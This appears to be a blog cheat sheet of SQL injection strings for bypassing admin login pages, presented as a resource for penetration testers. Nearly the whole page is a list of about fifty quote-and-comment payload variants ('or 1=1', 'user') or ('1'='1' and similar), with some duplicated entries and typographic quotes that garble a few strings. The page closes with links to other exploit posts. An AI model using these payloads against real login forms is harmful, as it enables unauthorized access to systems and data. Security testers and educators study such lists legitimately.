SQL Injection Admin Login Bypass Cheat Sheet
SQL injection is a poor input validation weakness caused by unsanitized user input. This list can be used by Penetration Testers when testing for SQL Injection admin Login Bypass. In this case, we use malicious code to bypass the login page of our target. We have prepared a cheat sheet for SQL Injection Admin Login Bypass.
- or 1=1
- or 1=1–
- or 1=1#
- or 1=1/*
- ‘ or 1=1 —
- ‘ or ‘1’=’1
- ‘ or 1=1 –+
- user’ —
- user’ #
- user’/*
- user’ or 1=1;#
- user’ or 1=1 LIMIT 1;#
- user’ or 1=1 LIMIT 1;#
- user’ or ‘1’=’1
- user’ or ‘1’=’1′–
- user’ or ‘1’=’1’#
- user’ or ‘1’=’1’/*
- user’or 1=1 or ”=’
- user’ or 1=1
- user’ or 1=1–
- user’ or 1=1#
- user’ or 1=1/*
- user’) or (‘1’=’1
- user’) or (‘1’=’1’–
- user’) or (‘1’=’1’#
- user’) or (‘1’=’1’/*
- user’) or ‘1’=’1
- user’) or ‘1’=’1′–
- user’) or ‘1’=’1’#
- user’) or ‘1’=’1’/*
- user” —
- user” #
- user”/*
- user” or “1”=”1
- user” or “1”=”1″–
- user” or “1”=”1″#
- user” or “1”=”1″/*
- user”or 1=1 or “”=”
- user” or 1=1
- user” or 1=1–
- user” or 1=1#
- user” or 1=1/*
- user”) or (“1″=”1
- user”) or (“1″=”1”–
- user”) or (“1″=”1″#
- user”) or (“1″=”1″/*
- user”) or “1”=”1
- user”) or “1”=”1″–
- user”) or “1”=”1″#
- user”) or “1”=”1″/*
Latest Posts
- CVE-2022-30190 (Follina)-Microsoft Support Diagnostic Tool Vulnerability
- SQL INJECTION – Extracting Username and Password From Database
- How To Dump Username And Password Using SQLMap Tool?
- Protected: Exploit Apache Log4j Security Vulnerabilities – CVE-2021-44228
- Hack The Box Previse HTB CTF Machine Walkthrough